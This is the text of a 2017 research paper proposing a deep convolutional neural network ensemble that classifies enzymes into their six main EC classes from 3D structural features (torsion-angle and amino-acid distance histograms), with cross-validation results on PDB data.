10.7717/peerj-cs.124 Copyright 2017 Zacharaki Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Prediction of protein function using a deep convolutional neural network ensemble Evangelia I. Zacharaki Center for Visual Computing, CentraleSupélec and GALEN Team, INRIA Saclay, France ABSTRACT Background. The availability of large databases containing high resolution three- dimensional (3D) models of proteins in conjunction with functional annotation allows the exploitation of advanced supervised machine learning techniques for automatic protein function prediction. Methods. In this work, novel shape features are extracted representing protein structure in the form of local (per amino acid) distribution of angles and amino acid distances, respectively. Each of the multi-channel feature maps is introduced into a deep convolutional neural network (CNN) for function prediction and the outputs are fused through support vector machines or a correlation-based k-nearest neighbor classifier. Two different architectures are investigated employing either one CNN per multi- channel feature set, or one CNN per image channel. Results. Cross validation experiments on single-functional enzymes (n=44,661) from the PDB database achieved 90.1% correct classification, demonstrating an improvement over previous results on the same dataset when sequence similarity was not considered. Discussion. The automatic prediction of protein function can provide quick an- notations on extensive datasets opening the path for relevant applications, such as pharmacological target identification. The proposed method shows promise for structure-based protein function prediction, but sufficient data may not yet be available to properly assess the method’s performance on non-homologous proteins and thus reduce the confounding factor of evolutionary relationships. Subjects Bioinformatics, Computational Biology, Data Mining and Machine Learning Keywords Enzyme classification, Function predition, Deep learning, Convolutional neural networks, Structure representation INTRODUCTION Metagenomics has led to a huge increase of protein databases and the discovery of new protein families (Godzik, 2011). While the number of newly discovered, but possibly redundant, protein sequences rapidly increases, experimentally verified functional annotation of whole genomes remains limited. Protein structure, i.e., the 3D configuration of the chain of amino acids, is a very good predictor of protein function, and in fact a more reliable predictor than protein sequence because it is far more conserved in nature (Illergård, Ardell & Elofsson, 2009). By now, the number of proteins with functional annotation and experimentally predicted structure of their native state (e.g., by NMR spectroscopy or X-ray How to cite this article Zacharaki (2017), Prediction of protein function using a deep convolutional neural network ensemble. PeerJ Comput. Sci. 3:e124; DOI 10.7717/peerj-cs.124 https://peerj.com mailto:\hfill \penalty -\@M evangelia.zacharaki@centralesupelec.fr mailto:\hfill \penalty -\@M evangelia.zacharaki@centralesupelec.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.124 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.124 crystallography) is adequately large to allow machine learning models to be trained that will be able to perform automatic functional annotation of unannotated proteins (Amidi et al., 2017). Also, as the number of protein sequences rapidly grows, the overwhelming majority of proteins can only be annotated computationally. In this work enzymatic structures from the Protein Data Bank (PDB) are considered and the enzyme commission (EC) number is used as a fairly complete framework for annotation. The EC number is a numerical classification scheme based on the chemical reactions the enzymes catalyze, proven by experimental evidence (Webb, 1992). There have been plenty machine learning approaches in the literature for automatic enzyme annotation. A systematic review on the utility and inference of various computational methods for functional characterization is presented in Sharma & Garg (2014), while a comparison of machine learning approaches can be found in Yadav & Tiwari (2015). Most methods use features derived from the amino acid sequence and apply support vector machines (SVM) (Cai et al., 2003; Han et al., 2004; Dobson & Doig, 2005; Chen et al., 2006; Zhou et al., 2007; Lu et al., 2007; Lee et al., 2009; Qiu et al., 2010; Wang et al., 2010; Wang et al., 2011; Amidi et al., 2016), k-nearest neighbor (kNN) classifier (Huang et al., 2007; Shen & Chou, 2007; Nasibov & Kandemir-Cavas, 2009), classification trees/forests (Lee et al., 2009; Kumar & Choudhary, 2012; Nagao, Nagano & Mizuguchi, 2014; Yadav & Tiwari, 2015), and neural networks (Volpato, Adelfio & Pollastri, 2013). In Borgwardt et al. (2005) sequential, structural and chemical information was combined into one graph model of proteins which was further classified by SVM. However, there has been little work in the literature on automatic enzyme annotation based only on structural information. A Bayesian approach (Borro et al., 2006) for enzyme classification using structure derived properties achieved 45% accuracy. Amidi et al. (2016) obtained 73.5% classification accuracy on 39,251 proteins from the PDB database when they used only structural information. In the past few years, deep learning techniques, and particularly convolutional neural networks, have rapidly become the tool of choice for tackling many challenging computer vision tasks, such as image classification (Krizhevsky, Sutskever & Hinton, 2012). The main advantage of deep learning techniques is the automatic exploitation of features and tuning of performance in a seamless fashion, that simplifies the conventional image analysis pipelines. CNNs have recently been used for protein secondary structure prediction (Spencer, Eickholt & Cheng, 2015; Li & Shibuya, 2015). In Spencer, Eickholt & Cheng (2015) prediction was based on the position-specific scoring matrix profile (generated by PSI-BLAST), whereas in Li & Shibuya (2015) 1D convolution was applied on features related to the amino acid sequence. Also, a deep CNN architecture was proposed in Lin, Lanchantin & Qi (2016) to predict protein properties. This architecture used a multilayer shift-and-stitch technique to generate fully dense per-position predictions on protein sequences. To the best of the author’s knowledge, deep CNNs have not been used for prediction of protein function so far. In this work the author exploits experimentally acquired structural information of enzymes and apply deep learning techniques in order to produce models that predict enzymatic function based on structure. Novel geometric descriptors are introduced and the efficacy of the approach is illustrated by classifying a dataset of 44,661 enzymes from Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 2/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.124 the PDB database into the l =6 primary categories: oxidoreductases (EC1), transferases (EC2), hydrolases (EC3), lyases (EC4), isomerases (EC5), ligases (EC6). The novelty of the proposed method lies first in the representation of the 3D structure as a ‘‘bag of atoms (amino acids)’’ which are characterized by geometric properties, and secondly in the exploitation of the extracted feature maps by deep CNNs. Although assessed for enzymatic function prediction, the method is not based on enzyme-specific properties and therefore can be applied (after re-training) for automatic large-scale annotation of other 3D molecular structures, thus providing a useful tool for data-driven analysis. In the following sections more details on the implemented framework are first provided, including the representation of protein structure, the CNN architecture and the fusion process of the network outputs. Then the evaluation framework and the obtained results are presented, followed by some discussion and conclusions. METHODS Data-driven CNN models tend to be domain agnostic and attempt to learn additional feature bases that cannot be represented through any handcrafted features. It is hypothesized that by combining ‘‘amino acid specific’’ descriptors with the recent advances in deep learning we can boost model performance. The main advantage of the proposed method is that it exploits complementarity in both data representation phase and learning phase. Regarding the former, the method uses an enriched geometric descriptor that combines local shape features with features characterizing the interaction of amino acids on this 3D spatial model. Shape representation is encoded by the local (per amino acid type) distribution of torsion angles (Bermejo, Clore & Schwieters, 2012). Amino acid interactions are encoded by the distribution of pairwise amino acid distances. While the torsion angles and distance maps are usually calculated and plotted for the whole protein (Bermejo, Clore & Schwieters, 2012), in the current approach they are extracted for each amino acid type separately, therefore characterizing local interactions. Thus, the protein structure is represented as a set of multi-channel images which can be introduced into any machine learning scheme designed for fusing multiple 2D feature maps. Moreover, it should be noted that the utilized geometric descriptors are invariant to global translation and rotation of the protein, therefore previous protein alignment is not required. Our method constructs an ensemble of deep CNN models that are complementary to each other. The deep network outputs are combined and introduced into a correlation- based kNN classifier for function prediction. For comparison purposes, support vector machines were also implemented for final classification. Two system architectures are investigated in which the multiple image channels are considered jointly or independently, as will be described next. Both architectures use the same CNN structure (within the highlighted boxes) which is illustrated in Fig. 1. Representation of protein structure The building blocks of proteins are amino acids which are linked together by peptide bonds into a chain. The polypeptide folds into a specific conformation depending on the interactions between its amino acid side chains which have different chemistries. Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 3/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.124 Figure 1 The deep CNN ensemble for protein classification. In this framework (Architecture 1) each multi-channel feature set is introduced to a CNN and results are combined by kNN or SVM classification. The network includes layers performing convolution (Conv), batch normalization (Bnorm), rectified lin- ear unit (ReLU) activation, dropout (optionally) and max-pooling (Pool). Details are provided in ‘Classi- fication by deep CNNs’. Many conformations of this chain are possible due to the rotation of the chain about each carbon (Cα) atom. For structure representation, two sets of feature maps were used. They express the shape of the protein backbone and the distances between the protein building blocks (amino acids). The use of global rotation and translation invariant features is preferred over features based on the Cartesian coordinates of atoms, in order to avoid prior protein alignment, which is a bottleneck in the case of large datasets with proteins of several classes (unknown reference template space). The feature maps were extracted for every amino acid being present in the dataset including the 20 standard amino acids, as well as asparagine/aspartic (ASX), glutamine/glutamic (GLX), and all amino acids with unidentified/unknown residues (UNK), resulting in m=23 amino acids in total. Torsion angles density The shape of the protein backbone was expressed by the two torsion angles of the polypeptide chain which describe the rotations of the polypeptide backbone around the bonds between N-Cα (angle φ) and Cα-C (angle ψ). All amino acids in the protein were grouped according to their type and the density of the torsion anglesφ andψ(∈[−180,180]) was estimated for each amino acid type based on the 2D sample histogram of the angles (also known as Ramachandran diagram) using equally sized bins (number of bins hA=19). The histograms were not normalized by the number of instances, therefore their values indicate the frequency of each amino acid within the polypeptide chain. In the obtained feature maps (XA), with dimensionality [hA×hA×m], the number of amino acids (m) corresponds to the number of channels. Smoothness in the density function was achieved by moving average filtering, i.e., by convoluting the density map with a 2D Gaussian kernel (σ =0.5). Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 4/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.124 Density of amino acid distances For each amino acid ai,i=1,...,m, distances to amino acid aj,j=1,...,m, in the protein are calculated based on the coordinates of the Cα atoms for the residues and stored as an array dij. Since the size of the proteins varies significantly, the length of the array dij is different across proteins, thus not directly comparable. In order to standardize measurements, the sample histogram of dij is extracted (using equally sized bins) and smoothed by convolution with a 1D Gaussian kernel (σ =0.5). The processing of all pairs of amino acids resulted in feature maps (XD) of dimension [m×m×hD], where hD =8 is the number of histogram bins (considered as number of channels in this case). Classification by deep CNNs Feature extraction stage of each CNN The CNN architecture employs three computational blocks of consecutive convolutional, batch normalization, rectified linear unit (ReLU) activation, dropout (optionally) and max-pooling layers, and a fully-connected layer. The convolutional layer computes the output of neurons that are connected to local regions in the input in order to extract local features. It applies a 2D convolution between each of the input channels and a set of filters. The 2D activation maps are calculated by summing the results over all channels and then stacking the output of each filter to produce the output 3D volume. Batch normalization normalizes each channel of the feature map by averaging over spatial locations and batch instances. The ReLU layer applies an element-wise activation function, such as the max(0,x) thresholding at zero. The dropout layer is used to randomly drop units from the CNN during training to reduce overfitting. Dropout was used only for the XA feature set. The pooling layer performs a downsampling operation along the spatial dimensions in order to capture the most relevant global features with fixed length. The max operator was applied within a [2×2] neighborhood. The last layer is fully-connected and represents the class scores. Training and testing stage of each CNN The output of each CNN is a vector of probabilities, one for each of the l possible enzymatic classes. The CNN performance can be measured by a loss function which assigns a penalty to classification errors. The CNN parameters are learned to minimize this loss averaged over the annotated (training) samples. The softmax loss function (i.e., the softmax operator followed by the logistic loss) is applied to predict the probability distribution over categories. Optimization was based on an implementation of stochastic gradient descent. At the testing stage, the network outputs after softmax normalization are used as class probabilities. Fusion of CNN outputs using two different architectures Two fusion strategies were implemented. In the first strategy (Architecture 1) the two feature sets, XA and XD, are each introduced into a CNN, which performs convolution at all channels, and then the l class probabilities produced for each feature set are combined into a feature vector of length l∗2. In the second strategy (Architecture 2), each one of the (m=23 or hD =8) channels of each feature set is introduced independently into a CNN and the obtained class probabilities are concatenated into a vector of l∗m features for XA Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 5/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.124 Table 1 Cross-validation accuracy (in percentage) in predicting main enzymatic function using the deep CNN ensemble. Architecture 1 Architecture 2 Class Samples Linear-SVM kNN Linear-SVM kNN EC1 8,075 86.4 88.8 91.2 90.6 EC2 12,739 84.0 87.5 88.0 91.7 EC3 17,024 88.7 91.3 89.6 94.0 EC4 3,114 79.4 78.4 84.9 80.7 EC5 1,905 69.5 68.6 79.6 77.0 EC6 1,804 61.0 60.6 73.6 70.4 Total 44,661 84.4 86.7 88.0 90.1 and l∗hD features for XD, respectively. These two feature vectors are further combined into a single vector of length l∗(m+hD) (=186). For both architectures, kNN classification was applied for final class prediction using as distance measure between two feature vectors, x1 and x2, the metric 1−cor(x1,x2), where cor is the sample Spearman’s rank correlation. The value k=12 was selected for all experiments. For comparison, fusion was also performed with linear SVM classification (Chang & Lin, 2011). The code was developed in MATLAB environment and the implementation of CNNs was based on MatConvNet (Vedaldi & Lenc, 2015). RESULTS The protein structures (n=44,661) were collected from the PDB. Only enzymes that occur in a single class were processed, whereas enzymes that perform multiple reactions and are hence associated with multiple enzymatic functions were excluded. Since protein sequence was not examined during feature extraction, all enzymes were considered without other exclusion criteria, such as small sequence length or homology bias. The dataset was unbalanced in respect to the different classes. The number of samples per class is shown in Table 1. The dataset was split into five folds. Four folds were used for training and one for testing. The training samples were used to learn the parameters of the network (such as the weights of the convolution filters), as well as the parameters of the subsequent classifiers used during fusion (SVM or kNN model). Once the network was trained, the class probabilities were obtained for the testing samples, which were introduced into the trained SVM or kNN classifier for final prediction. The SVM model was linear and thus didn’t require any hyper-parameter optimization. Due to the lack of hyper-parameters, no extra validation set was necessary. On the side, the author also examined non-linear SVM with a Gaussian radial basis function kernel, but didn’t observe any significant improvement; thus, the corresponding results are not reported. A classification result was deemed a true positive if the match with the highest probability was in first place in a rank-ordered list. The classification accuracy (percentage of correctly classified samples over all samples) was calculated for each fold and then averaged across the five folds. Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 6/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.124 Table 2 Confusion matrices for each fusion scheme and classification technique. Classifier Prediction by Architecture 1 Prediction by Architecture 2 1 2 3 4 5 6 1 2 3 4 5 6 Linear-SVM EC1 86.5 4.9 4.8 1.8 1.1 1.0 91.2 2.9 1.9 2.2 1.1 0.7 EC2 3.4 84.0 7.9 1.9 1.2 1.6 3.6 88.0 3.5 2.2 1.2 1.5 EC3 2.4 6.1 88.7 1.0 0.8 1.0 2.3 4.1 89.6 1.6 1.2 1.2 EC4 4.4 7.3 5.7 79.4 1.8 1.3 4.3 4.9 2.7 84.9 1.7 1.4 EC5 7.0 10.1 9.0 2.9 69.4 1.6 4.5 5.4 4.7 4.4 79.5 1.7 EC6 5.9 15.5 13.0 2.3 2.3 61.0 5.5 10.3 5.4 3.3 1.9 73.6 kNN EC1 88.8 5.0 4.5 0.7 0.5 0.5 90.6 4.4 4.6 0.3 0.1 0.0 EC2 2.5 87.5 7.4 1.0 0.6 1.1 1.7 91.7 5.8 0.3 0.2 0.4 EC3 1.8 5.4 91.3 0.5 0.4 0.6 1.2 4.4 94.0 0.2 0.1 0.2 EC4 3.8 9.1 7.2 78.5 1.1 0.4 3.7 8.4 6.9 80.7 0.1 0.1 EC5 6.1 11.5 10.7 2.3 68.5 1.0 3.5 9.7 8.6 0.9 76.9 0.3 EC6 4.9 18.8 13.5 1.0 1.3 60.6 4.2 14.1 10.3 0.7 0.3 70.5 Classification performance Common options for the network were used, except of the size of the filters which was adjusted to the dimensionality of the input data. Specifically, the convolutional layer used neurons with a receptive field of size 5 for the first two layers and 2 for the third layer. The stride (specifying the sliding of the filter) was always 1. The number of filters was 20, 50 and 500 for the three layers, respectively, and the learning rate was 0.001. The batch size was selected according to the information amount (dimensionality) of the input. It was assumed (and verified experimentally) that for more complicated data, a larger number of samples is required for learning. One thousand samples per batch were used for Architecture 1, which takes as input all channels, and 100 samples per batch for Architecture 2, in which an independent CNN is trained for each channel. The dropout rate was 20%. The number of epochs was adjusted to the rate of convergence for each architecture (300 for Architecture 1 and 150 for Architecture 2). The average classification accuracy over the five folds for each enzymatic class is shown in Table 1 for both fusion schemes, whereas the analytic distribution of samples in each class is shown in the form of confusion matrices in Table 2. In order to further assess the performance of the deep networks, receiver operating characteristic (ROC) curves and area-under-the-curve (AUC) values were calculated for each class for the selected scheme (based on kNN and Architecture 2), as shown in Fig. 2). The calculations were performed based on the final decision scores in a one-versus-rest classification scheme. The decision scores for the kNN classifier reflected the ratio of the within-class neighbors over total number of neighbors. The ROC curve represents the true positive rate against the false positive rate and was produced by averaging over the five folds of the cross-validation experiments. Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 7/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.124 Figure 2 ROC curves for each enzymatic class based on kNN and Architecture 2. (A) EC1, (B) EC2, (C) EC3, (D) EC4, (E) EC5, (F) EC6. Effect of sequence redundancy and sample size Analysis of protein datasets is often performed after removal of redundancy, such that the remaining entries do not overreach a pre-arranged threshold of sequence identity. In the previously presented results, sequence/threshold metrics were not applied to remove sequence-redundancy. Although structure similarity is affected by sequence similarity, the aim was not to lose structural entries (necessary for efficient learning) over a sequence based threshold cutoff. Also, only X-ray crystallography data were used; such data represent a ‘snapshot’ of a given protein’s 3D structure. In order not to miss the multiple poses that the same protein may adopt in different crystallography experiments, the whole dataset was explored. Subsequently, the performance of the method was also investigated on a less redundant dataset and the classification accuracy was compared in respect to the original (redundant) dataset, but randomly subsampled to include equal number of proteins. This experiment allows to assess the effect of redundancy under the same conditions (number of samples). Since inference in deep networks requires the estimation of a very large number of parameters, a large amount of training data is required and therefore very strict filtering strategies could not be applied. A dataset, the pdbaanr (http://dunbrack.fccc.edu/Guoli/pisces_download.php), pre-compiled by PISCES (Wang & Dunbrack, 2003), was used that includes only non-redundant sequences across all PDB files (n=23242 proteins, i.e., half in size of the original dataset). This dataset has one representative for each unique sequence in the PDB; representative chains are selected based on the highest resolution structure available and then the best R-values. Non-X-ray structures are considered after X-ray structures. As a note, the author also explored the Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 8/17 https://peerj.com http://dunbrack.fccc.edu/Guoli/pisces_download.php http://dx.doi.org/10.7717/peerj-cs.124 Leaf algorithm (Bull, Muldoon & Doig, 2013) which is especially designed to maximize the number of retained proteins and has shown improvement over PISCES. However, the computational cost was too high (possibly due to the large number of samples) and the analysis was not completed. The classification performance was assessed on Architecture 2 by using 80% of the samples for training and 20% of the samples for testing. For the pdbaanr dataset, the accuracy was 79.3% for kNN and 75.5% for linear-SVM, whereas for the sub-sampled dataset it was 85.7% for kNN and 83.2% for linear-SVM. The results show that for the selected classifier (kNN), the accuracy drops 4.4% when the number of samples is reduced to the half, and it also drops additionally 6.4% if the utilized sequences are less similar. The decrease in performance shows that the method is affected by the number of samples as well as by their similarity level. Structural representation and complementarity of features Next, some examples of the extracted feature maps are illustrated, in order to provide some insight on the representation of protein’s 3D structure. The average (over all samples) 2D histogram of torsion angles for each amino acid is shown in Fig. 3. The horizontal and vertical axes at each plot represent torsion angles (in [−180◦,180◦]). It can be observed that the non-standard (ASX, GLX, UNK) amino acids are very rare, thus their density maps have mostly zeros. The same color scale was used in all plots to make feature maps comparable, as ‘‘seen’’ by the deep network. Since the histograms are (deliberately) not normalized for each sample, rare amino acids will have few visible features and due to the ‘max-pooling operator’ will not be selected as significant features. The potential of these feature maps to differentiate between classes is illustrated in Fig. 4 for three randomly selected amino acids (ALA, GLY, TYR). Overall the spatial patterns in each class are distinctive and form a multi-dimensional signature for each sample. As a note, before training of the CNN ensemble, data standardization is performed by subtracting the mean density map. The same map is used to standardize the test sample during assessment. Examples of features maps representing amino acid distances (XD) are illustrated in Figs. 1 and 5. Figure 1 illustrates an image slice across the 3rd dimension, i.e., one [m×m] channel, and as introduced in the 2D multichannel CNN, i.e., after mean-centering (over all samples). Figure 5 illustrates image slices (of size [m×hD]) across the 1st dimension averaged within each class. Figure 5 has been produced by selecting the same amino acids as in Fig. 4 for ease of comparison of the different feature representations. It can be noticed that for all classes most pairwise distances are concentrated in the last bin, corresponding to high distances between amino acids. Also, as expected there are differences in quantity of each amino acid, e.g., by focusing on the last bin, it can be seen that ALA and GLY have higher values than TYR in most classes. Moreover, the feature maps indicate clear differences between samples of different classes. The discrimination ability and complementary of the extracted features in respect to classification performance is shown in Table 3. It can be observed that the relative position of amino acids and their arrangement in space (features XD) predict enzymatic function better than the backbone conformation (features XA). Also, the fusion of network decisions Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 9/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.124 Figure 3 Torsion angles density maps (Ramachandran plots) averaged over all samples for each of the 20 standard and three non-standard (ASX, GLX, UNK) amino acids shown in alphabetical order from (A) to (W). The horizontal and vertical axes at each plot correspond to φ and ψ angles and vary from−180◦ (top left) to 180◦ (right bottom). The color scale (blue to red) is in the range [0,1]. For an amino acid a, red means that the number of occurrences of the specific value (φ,ψ) in all observations of a (within and across proteins) is at least equal to the number of proteins. On the opposite, blue indi- cates a small number of occurrences, and is observed for rare amino acids or unfavorable conformations. (A) ALA, (B) ARG, (C) ASN, (D) ASP, (E) ASX, (F) CYS, (G) GLN, (H) MET, (I) GLU, (J) GLX, (K) GLY, (L) HIS, (M) ILE, (N) LEU, (O) LYS, (P) PHE, (Q) PRO, (R) SER, (S) THR, (T) TRP, (U) TYR, (V) UNK, (W) VAL. Table 3 Cross-validation accuracy (average ± standard deviation over five folds) for each feature set separately and after fusion of CNN outputs based on Architecture 2. Feature sets Linear-SVM kNN XA (angles) 79.6± 0.5 82.4± 0.4 XD (distances) 88.1± 0.4 89.8± 0.2 Ensemble 88.0± 0.4 90.1± 0.2 based on correlation distance outperforms predictions from either network alone, but the difference is only marginal in respect to the predictions by XD. In all cases the differences in prediction for the performed experiments (during cross validation) was very small (usually standard deviation <0.5%), indicating that the method is robust to variations in training examples. Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 10/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.124 Figure 4 Ramachandran plots averaged across samples within each class. Rows correspond to amino acids and columns to functional classes. Three amino acids (ALA from (A) to (F), GLY from (G) to (L) and TYR from (M) to (R)) are randomly selected for illustration of class separability. The horizontal and vertical axes at each plot correspond to φ and ψ angles and vary from−180◦ (top left) to 180◦ (right bot- tom). The color scale (blue to red) is in the range [0,1] as illustrated in Fig. 3. DISCUSSION A deep CNN ensemble was presented that performs enzymatic function classification through fusion in feature level and decision level. The method has been applied for the prediction of the primary EC number and achieved 90.1% accuracy, which is a considerable improvement over the accuracy obtained in our previous work (73.5% in Amidi et al. (2016) and 83% in Amidi et al. (2017)) when only structural information was incorporated. These results were achieved without imposing any pre-selection criteria, such as based on sequence identity, thus the effect of evolutionary relationships, as confounding factor in the prediction of function from 3D structure, has not been sufficiently studied. Since deep learning technology requires a large number of samples to produce generalizable models, a filtered dataset with only non-redundant proteins would be too small for reliable training. This is a limitation of the current approach, which mainly aimed to increase predictive power over previous methods using common features for structural representation and common classifiers such as SVM and nearest neighbor, rather than addressing this confounding factor in the prediction of protein structure. Many methods have been proposed in the literature using different features and different classifiers. Nasibov & Kandemir-Cavas (2009) obtained 95%–99% accuracy by applying kNN-based classification on 1200 enzymes based on their amino acid composition. Shen & Chou (2007) fused results derived from the functional domain and evolution information and obtained 93.7% average accuracy on 9,832 enzymes. On the same dataset, Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 11/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.124 Figure 5 Histograms of paiwise amino acid distances averaged across samples within each class. The same three amino acids selected in Fig. 4 are also shown here (ALA from (A) to (F), GLY from (G) to (L) and TYR from (M) to (R)). The horizontal axis at each plot represents the histogram bins (distance values in the range [5,40]). The vertical axis at each plot corresponds to the 23 amino acids sorted alphabetically from top to bottom (ALA, ARG, ASN, ASP, ASX, CYS, GLN, MET, GLU, GLX, GLY, HIS, ILE, LEU, LYS, PHE, PRO, SER, THR, TRP, TYR, UNK, VAL). Thus each row shows the histogram of distances for a spe- cific pair of the amino acids (the one in the title and the one corresponding to the specific row). The color scale is the same for all plots and is shown horizontally at the bottom of the figure. Wang et al. (2011) improved the accuracy (which ranged from 81% to 98% when predicting the first three EC digits) by using sequence encoding and SVM for hierarchy labels. Kumar & Choudhary (2012) reported overall accuracy of 87.7% in predicting the main class for 4,731 enzymes using random forests. Volpato, Adelfio & Pollastri (2013) applied neural networks on the full sequence and achieve 96% correct classification on 6,000 non-redundant proteins. Most of the previous methods incorporate sequence-based features. Many were assessed on a subset of enzymes acquired after imposition of different pre-selection criteria and levels of sequence similarity. More discussion on machine learning techniques for single-label and multi-label enzyme classification can be found in Amidi et al. (2017). Assessment of the relationship between function and structure (Todd, Orengo & Thornton, 2001) revealed 95% conservation of the fourth EC digit for proteins with up to 30% sequence identity. Similarity, Devos & Valencia (2000) concluded that enzymatic Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 12/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.124 function is mostly conserved for the first digit of EC code whereas more detailed functional characteristics are poorly conserved. It is generally believed that as sequences diverge, 3D protein structure becomes a more reliable predictor than sequence, and that structure is far more conserved than sequence in nature (Illergård, Ardell & Elofsson, 2009). The focus of this study was to explore the predictive ability of 3D structure and provide a tool that can generalize in cases where sequence information is insufficient. Thus, the presented results are not directly comparable to the ones of previous methods due to the use of different features and datasets. If desired, the current approach can easily incorporate also sequence-related features. In such a case however, the use of non-homologous data would be inevitable for rigorous assessment. The reported accuracy is the average of five folds on the testing set. A separate validation set was not used within each fold, because the design of the network architecture (size of convolution kernel, number of layers, etc.) and the final classifier (number of neighbors in kNN) were preselected and not optimized within the learning framework. Additional validation and optimization of the model would be necessary to improve performance and provide better insight into the capabilities of this method. A possible limitation of the proposed approach is that the extracted features do not capture the topological properties of the 3D structure. Due to the statistical nature of the implemented descriptors, which were calculated by considering the amino acids as elements in Euclidean space, connectivity information is not strictly retained. The author and colleagues recently started to investigate in parallel the predictive power of the original 3D structure, represented as a volumetric image, without the extraction of any statistical features. Since the more detailed representation increased the dimensionality considerably, new ways are being explored to optimally incorporate the relationship between the structural units (amino-acids) in order not to impede the learning process. CONCLUSIONS A method was presented that extracts shape features from the 3D protein geometry that are introduced into a deep CNN ensemble for enzymatic function prediction. The investigation of protein function based only on structure reveals relationships hidden at the sequence level and provides the foundation to build a better understanding of the molecular basis of biological complexity. Overall, the presented approach can provide quick protein function predictions on extensive datasets opening the path for relevant applications, such as pharmacological target identification. Future work includes application of the method for prediction of the hierarchical relation of function subcategories and annotation of enzymes up to the last digit of the enzyme classification system. ACKNOWLEDGEMENTS The authors want to thank Prof. N Paragios from the Center for Visual Computing, CentraleSupélec, Paris, for providing the means to complete this study and Dr. D Vlachakis from the Multidimensional Data Analysis and Knowledge Management Laboratory, University of Patras, for useful discussions on the biological aspects. Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 13/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.124 ADDITIONAL INFORMATION AND DECLARATIONS Funding This research was partially supported by European Research Council Grant Diocles (ERC-STG-259112). There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: European Research Council Grant Diocles: ERC-STG-259112. Competing Interests The authors declare there are no competing interests. Author Contributions • Evangelia I. Zacharaki conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The raw data can be found in the PDB public database: www.rcsb.org/pdb/. The code can be downloaded from https://github.com/ezachar/PeerJ. The code can run either using PDB entries downloaded locally or by accessing the entries from the PDB during run-time. REFERENCES Amidi A, Amidi S, Vlachakis D, Paragios N, Zacharaki EI. 2016. A machine learning methodology for enzyme functional classification combining structural and protein sequence descriptors. In: Bioinformatics and Biomedical Engineering. Cham: Springer, 728–738. Amidi S, Amidi A, Vlachakis D, Paragios N, Zacharaki EI. 2017. Automatic single- and multi-label enzymatic function prediction by machine learning. PeerJ 5:e3095 DOI 10.7717/peerj.3095. Bermejo GA, Clore GM, Schwieters CD. 2012. Smooth statistical torsion angle potential derived from a large conformational database via adaptive kernel density estimation improves the quality of NMR protein structures. Protein Science 21(12):1824–1836 DOI 10.1002/pro.2163. Borgwardt KM, Ong CS, Schönauer S, Vishwanathan S, Smola AJ, Kriegel H-P. 2005. Protein function prediction via graph kernels. Bioinformatics 21(suppl 1):i47–i56 DOI 10.1093/bioinformatics/bti1007. Borro LC, Oliveira SR, Yamagishi ME, Mancini AL, Jardine JG, Mazoni I, Santos ED, Higa RH, Kuser PR, Neshich G. 2006. Predicting enzyme class from protein structure using Bayesian classification. Genetics and Molecular Research 5(1):193–202. Zacharaki (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.124 14/17 https://peerj.com www.rcsb.org/pdb/ https://github.com/ezachar/PeerJ http://dx.doi.org/10.7717/peerj.3095 http://dx.doi.org/10.1002/pro.2163 http://dx.doi.org/10.1093/bioinformatics/bti1007 http://dx.doi.org/10.7717/peerj-cs.124 Bull SC, Muldoon MR, Doig AJ. 2013. Maximising the size of non-redundant protein datasets using graph theory. PLOS ONE 8(2):e55484 DOI 10.1371/journal.pone.0055484. Cai C, Han L, Ji ZL, Chen X, Chen YZ. 2003. SVM-Prot: web-based support vector machine software for functional classification of a protein from its primary sequence. Nucleic Acids Research 31(13):3692–3697 DOI 10.1093/nar/gkg600. Chang C-C, Lin C-J. 2011. LIBSVM: a library for support vector machines. ACM Transactions on Intelligent Systems and Technology (TIST) 2(3):Article 27 DOI 10.1145/1961189.1961199. Chen C, Tian Y-X, Zou X-Y, Cai P-X, Mo J-Y. 2006. Using pseudo-amino acid com- position and support vector machine to predict protein structural class. Journal of Theoretical Biology 243(3):444–448 DOI 10.1016/j.jtbi.2006.06.025. Devos D, Valencia A. 2000. Practical limits of function prediction. Proteins: Structure, Function, and Bioinformatics 41(1):98–107 DOI 10.1002/1097-0134(20001001)41:1<98::AID-PROT120>3.0.CO;2-S. Dobson PD, Doig AJ. 2005. Predicting enzyme class from protein structure without alignments. Journal of Molecular Biology 345(1):187–199 DOI 10.1016/j.jmb.2004.10.024. Godzik A. 2011. Metagenomics and the protein universe. Current Opinion in Structural Biology 21(3):398–403 DOI 10.1016/j.sbi.2011.03.010. Han L, Cai C, Ji Z, Cao Z, Cui J, Chen Y. 2004. Predicting functional family of novel enzymes irrespective of sequence similarity: a statistical learning approach. Nucleic Acids Research 